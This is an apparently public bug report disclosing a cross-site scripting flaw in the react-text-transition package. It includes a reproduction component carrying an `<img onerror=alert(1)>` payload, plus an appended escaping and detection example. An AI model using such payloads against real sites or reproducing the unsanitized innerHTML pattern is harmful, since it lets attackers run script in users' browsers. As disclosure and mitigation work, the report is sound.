Issue status: Open
Reported by @gtsp233
Description
I've found a Cross-Site Scripting (XSS) vulnerability in this package
Vulnerability Details:
- Severity: High/Critical
- Description: There's a risk of malicious script execution when an adversary controls the text.
Steps to Reproduce:
In a React.js project:
```jsx
import React from "react";
import TextTransition, { presets } from "react-text-transition";

const App = () => {
  const [index, setIndex] = React.useState(0);

  React.useEffect(() => {
    const intervalId = setInterval(
      () => setIndex((index) => index + 1),
      3000 // every 3 seconds
    );
    // an interval must be cleared with clearInterval, not clearTimeout
    return () => clearInterval(intervalId);
  }, []);

  return (
    <h1>
      <TextTransition
        text={`<img src='' onerror=alert(1)></img>`}
        springConfig={presets.wobbly}
      />
    </h1>
  );
};

export default App;
```
Suggested Fix or Mitigation:
It is best practice to sanitize the text before passing it to innerHTML. Please consider sanitizing it using popular sanitization libraries, e.g., dompurify, to prevent any XSS. Thanks!
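The following is an added example, not code from this issue or from react-text-transition, illustrating the mitigation the report asks for: attacker-controlled text must be escaped (or sanitized with a library such as DOMPurify) before it is placed into an HTML string that ends up in innerHTML. `escapeHtml` and `buildMarkup` are assumptions introduced here; `buildMarkup` stands in for whatever markup a transition component builds around the text, and `escapeHtml` is a minimal substitute for a sanitization library that is sufficient when the value is meant to be plain text.

```javascript
// Added example (not from the issue or the react-text-transition project).
// Compares inserting caller-controlled text into markup as-is with escaping
// it first. For plain-text values, escaping the HTML-significant characters
// is enough; use a sanitizer such as DOMPurify only if markup must be kept.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Escape every character that could start a tag, attribute or entity so the
// browser renders the value as literal text instead of parsing it as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical markup builder: wraps the text in a span the way a transition
// component might before assigning the result to innerHTML. With
// `escape: false` the text is interpolated raw (the vulnerable pattern);
// with `escape: true` it goes through escapeHtml first (the mitigated form).
function buildMarkup(text, { escape }) {
  const inner = escape ? escapeHtml(text) : text;
  return `<span class="text-transition">${inner}</span>`;
}

// Defender-side check: does the produced markup contain any element tag
// other than the wrapper span we generated ourselves?
function containsForeignTag(html) {
  const withoutWrapper = html
    .replace(/^<span class="text-transition">/, "")
    .replace(/<\/span>$/, "");
  return /<\s*[a-zA-Z!\/]/.test(withoutWrapper);
}

// Constructed sample input: the payload quoted in the report.
const PAYLOAD = `<img src='' onerror=alert(1)></img>`;

const unsafeMarkup = buildMarkup(PAYLOAD, { escape: false });
const safeMarkup = buildMarkup(PAYLOAD, { escape: true });

if (typeof require !== "undefined" && require.main === module) {
  console.log("raw      :", unsafeMarkup, "->", containsForeignTag(unsafeMarkup));
  console.log("escaped  :", safeMarkup, "->", containsForeignTag(safeMarkup));
}
```

In a React component the simplest form of this fix is to render the text as a child (`<span>{text}</span>`), which React escapes automatically, and to reserve `dangerouslySetInnerHTML` for values that have already been sanitized.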